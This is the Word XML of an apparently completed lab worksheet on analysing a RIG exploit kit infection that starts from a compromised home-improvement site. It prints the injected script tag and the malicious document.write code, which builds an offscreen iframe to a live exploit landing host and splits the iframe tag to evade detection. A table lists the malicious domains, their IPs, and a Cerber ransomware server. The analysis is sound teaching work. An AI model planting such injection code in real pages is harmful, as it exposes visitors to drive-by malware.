    <w:p w14:paraId="2675E1A9">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&lt;head profile="http://gmpg.org/xfn/11"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="135EC8AB">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&lt;meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36450B68">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&lt;title&gt;Remodeling Your Kitchen Cabinets | Home Improvement&lt;/title&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77EE53EE">
      <w:pPr>
        <w:pStyle w:val="47"/>
        <w:ind w:left="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="36"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="tx1"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0D16C860">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&lt;link rel="alternate" type="application/rss+xml" href="//www.homeimprovement.com/?feed=rss2" title="Home Improvement latest posts" /&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E11C88B">
      <w:pPr>
        <w:pStyle w:val="47"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="36"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="tx1"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4B4742C7">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&lt;link rel="alternate" type="application/rss+xml" href="//www.homeimprovement.com/?feed=comments-rss2" title="Home Improvement latest comments" /&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07D9B4AC">
      <w:pPr>
        <w:pStyle w:val="47"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="36"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="tx1"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="45F4DEEF">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&lt;link rel="pingback" href="//www.homeimprovement.com/xmlrpc.php" /&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E19565B">
      <w:pPr>
        <w:pStyle w:val="47"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="36"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="tx1"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0D12D19B">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&lt;link rel="shortcut icon" href="//www.homeimprovement.com/wp-content/themes/arras/images/favicon.ico" /&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25FFD40B">
      <w:pPr>
        <w:pStyle w:val="47"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="36"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="tx1"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="62766E54">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&lt;script type="text/javascript" src="//retrotip.visionurbana.com.ve/engine/classes/js/dle_js.js"&gt;&lt;/script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74737F87">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 All in One SEO Pack 2.3.2.3 by Michael Torbert of Semper Fi Web Design[291,330] --&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DF05748">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&lt;meta name="description"  content="Installing cabinets in a remodeled kitchen require some basic finish carpentry skills. Before starting any installation, it's a good idea to mark some level and" /&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="585114BC">
      <w:pPr>
        <w:pStyle w:val="47"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="36"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="tx1"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="39955740">
      <w:pPr>
        <w:pStyle w:val="47"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="36"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="tx1"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="36"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="tx1"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
        <w:t>&lt;meta name="keywords"  content="cabinets,kitchen,kitchen cabints,knobs,remodel" /&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3140FBC2">
      <w:pPr>
        <w:pStyle w:val="47"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="36"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="tx1"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="36"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="tx1"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
        <w:t>&lt;some output omitted&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2506FC39">
      <w:pPr>
        <w:pStyle w:val="41"/>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Open the dle_js.js file in choice of text editor and examine it.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59DD23D8">
      <w:pPr>
        <w:pStyle w:val="47"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="32"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="tx1"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="32"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="tx1"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
        <w:t>document.write('&lt;div class="" style="position:absolute; width:383px; height:368px; left:17px; top:-858px;"&gt;  &lt;div  style="" class=""&gt;&lt;a&gt;head&lt;/a&gt;&lt;a class="head-menu-2"&gt; &lt;/a&gt;&lt;iframe src="http://tyu.benme.com/?q=zn_QMvXcJwDQDofGMvrESLtEMUbQA0KK2OH_76iyEoH9JHT1vrTUSkrttgWC&amp;biw=Amaya.81lp85.406f4y5l9&amp;oq=elTX_fUlL7ABPAuy2EyALQZnlY0IU1IQ8fj630PWwUWZ0pDRqx29UToBvdeW&amp;yus=Amaya.110oz60.406a7e5q8&amp;br_fl=4109&amp;tuif=5364&amp;ct=Amaya" width=290 height=257 &gt;&lt;/ifr' +'ame&gt; &lt;a style=""&gt;&lt;/a&gt;&lt;/div&gt;&lt;a class="" style=""&gt;temp&lt;/a&gt;&lt;/div&gt;');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="653A8B0E">
      <w:pPr>
        <w:pStyle w:val="47"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="32"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="tx1"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="13B5080A">
      <w:pPr>
        <w:pStyle w:val="42"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t>This  file is:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="230210B2">
      <w:pPr>
        <w:pStyle w:val="42"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="36"/>
          <w:shd w:val="clear" w:color="auto" w:fill="D4EDDA"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="36"/>
          <w:shd w:val="clear" w:color="auto" w:fill="D4EDDA"/>
        </w:rPr>
        <w:t>Javascript document.write() will write content to the webpage, creating an iframe, that takes the user to a URI at tyu.benme.com</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="214744D2">
      <w:pPr>
        <w:pStyle w:val="42"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t>the code in the javascript file attempt to avoid detection:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4628030E">
      <w:pPr>
        <w:pStyle w:val="41"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:ind w:left="360"/>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eastAsia="Helvetica" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:shd w:val="clear" w:color="auto" w:fill="D4EDDA"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="tx1"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
        <w:t>By splitting the end iframe tag into two piecesThe &lt;/ifr’ +’ame&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3028AD28">
      <w:pPr>
        <w:pStyle w:val="41"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="18"/>
        </w:numPr>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In a text editor, open the text/html file that was saved to your home folder with Vivaldi as part of the filename.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E561882">
      <w:pPr>
        <w:pStyle w:val="42"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t>The  kind of file  is:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27F72665">
      <w:pPr>
        <w:pStyle w:val="42"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="36"/>
          <w:shd w:val="clear" w:color="auto" w:fill="D4EDDA"/>
        </w:rPr>
        <w:t>An HTML webpage</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F88AB23">
      <w:pPr>
        <w:pStyle w:val="42"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t>Their  are some interesting things about the iframe, it call anything:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D650226">
      <w:pPr>
        <w:pStyle w:val="42"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="36"/>
          <w:shd w:val="clear" w:color="auto" w:fill="D4EDDA"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="36"/>
          <w:shd w:val="clear" w:color="auto" w:fill="D4EDDA"/>
        </w:rPr>
        <w:t>It is hidden. It calls a start() function</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BFAA979">
      <w:pPr>
        <w:pStyle w:val="42"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t xml:space="preserve"> the </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t>start()</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t xml:space="preserve"> function :</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F738D0A">
      <w:pPr>
        <w:pStyle w:val="42"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t>It writes to the browser window. It creates an HTML form and submits the variable NormalURL through POST. The NormalURL variable equals a URI at tyu.benme.com.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="143DE01F">
      <w:pPr>
        <w:pStyle w:val="42"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t>What do you think the purpose of the getBrowser() function is?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35A2B7CD">
      <w:pPr>
        <w:pStyle w:val="42"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t>The getBrowser() function determines the type of browser that the webpage is displayed in</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53DD3C44">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:ind w:left="0"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6B8400D3">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="48"/>
          <w:szCs w:val="48"/>
          <w:rtl/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="tx1"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3A6ECECF">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="48"/>
          <w:szCs w:val="48"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="tx1"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="48"/>
          <w:szCs w:val="48"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="tx1"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
        <w:t>Reflection</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4800BBC8">
      <w:pPr>
        <w:pStyle w:val="3"/>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Exploit Kits are fairly complex exploits that use a variety of methods and resources to carry out an attack. Interestingly EKs may be used to deliver diverse malware payloads. This is because the EK developer may offer the exploit kit as a service to other threat actors. Therefore, RIG EK has been associated with a number of different malware payloads. The following questions may require you investigate the data further using the tools that were introduced in this lab.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F30C6AA">
      <w:pPr>
        <w:pStyle w:val="48"/>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The EK used a number of websites. Complete the table below.</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="50"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:jc w:val="center"/>
        <w:tblDescription w:val="This table lists the Url, ip address and functions of websites. You can record your info in the cells labeled as &quot;blank&quot;."/>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autofit"/>
        <w:tblCellMar>
          <w:top w:w="14" w:type="dxa"/>
          <w:left w:w="115" w:type="dxa"/>
          <w:bottom w:w="14" w:type="dxa"/>
          <w:right w:w="115" w:type="dxa"/>
        </w:tblCellMar>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="3216"/>
        <w:gridCol w:w="2986"/>
        <w:gridCol w:w="3388"/>
      </w:tblGrid>
      <w:tr w14:paraId="15BC2C9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3131" w:type="dxa"/>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6D424DE2">
            <w:pPr>
              <w:pStyle w:val="49"/>
              <w:wordWrap/>
              <w:jc w:val="left"/>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URL</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3093" w:type="dxa"/>
            <w:tcBorders>
              <w:top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23B2C70C">
            <w:pPr>
              <w:pStyle w:val="49"/>
              <w:wordWrap/>
              <w:jc w:val="left"/>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IP Address</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3563" w:type="dxa"/>
            <w:tcBorders>
              <w:top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1C8AD939">
            <w:pPr>
              <w:pStyle w:val="49"/>
              <w:wordWrap/>
              <w:jc w:val="left"/>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Function</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="36F5132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3131" w:type="dxa"/>
            <w:vAlign w:val="bottom"/>
          </w:tcPr>
          <w:p w14:paraId="6F0737E7">
            <w:pPr>
              <w:pStyle w:val="5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www.bing.com</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3093" w:type="dxa"/>
            <w:vAlign w:val="bottom"/>
          </w:tcPr>
          <w:p w14:paraId="02F888B7">
            <w:pPr>
              <w:pStyle w:val="5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w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3563" w:type="dxa"/>
            <w:vAlign w:val="bottom"/>
          </w:tcPr>
          <w:p w14:paraId="13A18842">
            <w:pPr>
              <w:pStyle w:val="51"/>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search engine links to legitimate webpage</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="5D64D89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3131" w:type="dxa"/>
            <w:vAlign w:val="top"/>
          </w:tcPr>
          <w:p w14:paraId="72ECEBCD">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:textAlignment w:val="baseline"/>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www.bing.com</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3093" w:type="dxa"/>
            <w:vAlign w:val="top"/>
          </w:tcPr>
          <w:p w14:paraId="061F047F">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N/A</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3563" w:type="dxa"/>
            <w:vAlign w:val="top"/>
          </w:tcPr>
          <w:p w14:paraId="6EFC3AB3">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search engine links to legitimate webpage</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="6B38AF6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3131" w:type="dxa"/>
            <w:vAlign w:val="top"/>
          </w:tcPr>
          <w:p w14:paraId="00D5101E">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www.homeimprovement.com</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3093" w:type="dxa"/>
            <w:vAlign w:val="top"/>
          </w:tcPr>
          <w:p w14:paraId="08D7EF6C">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104.28.18.74</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3563" w:type="dxa"/>
            <w:vAlign w:val="top"/>
          </w:tcPr>
          <w:p w14:paraId="5F08AF44">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malicious iFrame redirects to malicious site</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="37920B3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3131" w:type="dxa"/>
            <w:vAlign w:val="top"/>
          </w:tcPr>
          <w:p w14:paraId="78AE4048">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retrotip.visionurbana.com.ve</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3093" w:type="dxa"/>
            <w:vAlign w:val="top"/>
          </w:tcPr>
          <w:p w14:paraId="4FE51526">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139.59.160.143</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3563" w:type="dxa"/>
            <w:vAlign w:val="top"/>
          </w:tcPr>
          <w:p w14:paraId="22692A8C">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executes malicious javascript</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="477A246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3131" w:type="dxa"/>
            <w:vAlign w:val="top"/>
          </w:tcPr>
          <w:p w14:paraId="78C5D67C">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tyu.benme.com</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3093" w:type="dxa"/>
            <w:vAlign w:val="top"/>
          </w:tcPr>
          <w:p w14:paraId="58C23D25">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194.87.234.129</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3563" w:type="dxa"/>
            <w:vAlign w:val="top"/>
          </w:tcPr>
          <w:p w14:paraId="2EB09613">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delivers malicious Adobe Flash file, exploit landing page.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="25C7BBE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3131" w:type="dxa"/>
            <w:vAlign w:val="top"/>
          </w:tcPr>
          <w:p w14:paraId="33D27009">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n/a</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3093" w:type="dxa"/>
            <w:vAlign w:val="top"/>
          </w:tcPr>
          <w:p w14:paraId="2B20D818">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90.2.10.0</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3563" w:type="dxa"/>
            <w:vAlign w:val="top"/>
          </w:tcPr>
          <w:p w14:paraId="260EEDDB">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:textAlignment w:val="baseline"/>
              <w:rPr>
                <w:rStyle w:val="52"/>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:szCs w:val="20"/>
                <w14:textFill>
                  <w14:solidFill>
                    <w14:schemeClr w14:val="tx1"/>
                  </w14:solidFill>
                </w14:textFill>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Helvetica" w:cs="Times New Roman"/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:kern w:val="0"/>
                <w:sz w:val="25"/>
                <w:szCs w:val="25"/>
                <w:lang w:eastAsia="zh-CN" w:bidi="ar"/>
                <w14:textFill>
                  <w14:solidFill>
                    <w14:schemeClr w14:val="tx1"/>
                  </w14:solidFill>
                </w14:textFill>
              </w:rPr>
              <w:t>Cerber ransomware checkin server</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="7A817D56">
      <w:pPr>
        <w:pStyle w:val="48"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="32"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="tx1"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="32"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="tx1"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
        <w:t>It is useful to “tell the story” of an exploit to understand what happened and how it works. Start with the user searching the internet with Bing. Search the web for more information on the RIG EK to help.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BC6A6B5">
      <w:pPr>
        <w:pStyle w:val="42"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>The purpose of this question is to start students thinking about the multiple step nature of EKs and the complexities of cyberattacks in general. The user is searching with Bing for information on home improvements. The user clicks a link to www.home</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79B82701">
      <w:pPr>
        <w:pStyle w:val="41"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:ind w:left="180"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="tx1"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="28BD44C1">
      <w:pPr>
        <w:pStyle w:val="41"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:ind w:left="180"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="tx1"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="271BB072">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="tx1"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:sectPr>
      <w:footerReference r:id="rId5" w:type="default"/>
      <w:pgSz w:w="12240" w:h="15840"/>
      <w:pgMar w:top="1440" w:right="1440" w:bottom="1440" w:left="1440" w:header="720" w:footer="720" w:gutter="0"/>
      <w:pgBorders>
        <w:top w:val="thickThinSmallGap" w:color="0070C0" w:sz="24" w:space="1"/>
        <w:left w:val="thickThinSmallGap" w:color="0070C0" w:sz="24" w:space="24"/>
        <w:bottom w:val="thickThinSmallGap" w:color="0070C0" w:sz="24" w:space="1"/>
        <w:right w:val="thickThinSmallGap" w:color="0070C0"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imSun"/>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sans-serif">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30783245"/>
      <w:docPartObj>
        <w:docPartGallery w:val="AutoText"/>
      </w:docPartObj>
    </w:sdtPr>
    <w:sdtContent>
      <w:p w14:paraId="6B6EFF1D">
        <w:pPr>
          <w:pStyle w:val="15"/>
        </w:pPr>
        <w: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align>bottom</wp:align>
                  </wp:positionV>
                  <wp:extent cx="2125980" cy="2054860"/>
                  <wp:effectExtent l="7620" t="0" r="0" b="2540"/>
                  <wp:wrapNone/>
                  <wp:docPr id="29" name="Isosceles Triangle 29"/>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wps:spPr>
                        <wps:txbx>
                          <w:txbxContent>
                            <w:p w14:paraId="15B8BE4A">
                              <w:pPr>
                                <w:jc w:val="center"/>
                                <w:rPr>
                                  <w:szCs w:val="72"/>
                                </w:rPr>
                              </w:pPr>
                              <w:r>
                                <w:rPr>
                                  <w:rFonts w:cs="Times New Roman" w:eastAsiaTheme="minorEastAsia"/>
                                  <w:sz w:val="22"/>
